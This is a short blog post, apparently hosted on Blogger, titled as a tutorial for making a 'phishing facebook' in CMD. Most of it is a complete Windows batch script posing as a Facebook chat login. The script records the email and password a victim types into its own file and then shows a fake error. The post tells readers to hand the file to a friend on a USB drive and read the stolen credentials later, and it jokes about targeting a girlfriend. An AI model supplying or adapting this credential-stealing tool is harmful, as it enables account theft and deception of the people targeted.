How to create a phishing facebook in CMD (command and prompt)

You maybe unbelieve about this trick... but it's very awesome.
you can steal your friends' password or your girlfriend's password. (Just kidding)


 how to create a phishing facebook in CMD or command and prompt?
Well, in this tutorial will show you how to create phishing via CMD.
Copy paste this in notepad...

TITLE FBChat
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO.
ECHO Please enter your email:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password:
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.bat
ECHO PASSWORD = %PSWD%>>FBChat.bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred while connecting to the server. Try again later.
PAUSE>NUL
EXIT


And now save it as FBChat.bat
then you will see this 


Now  open it or paste it in ur USB drive,and tell ur friend that u just made an application yourself and to make him try it out.

And when you get ur drive back,right click on FBChat.bat,edit and you can see Email and password at the bottom.
Here the result:

1 comment:

Powered by Blogger.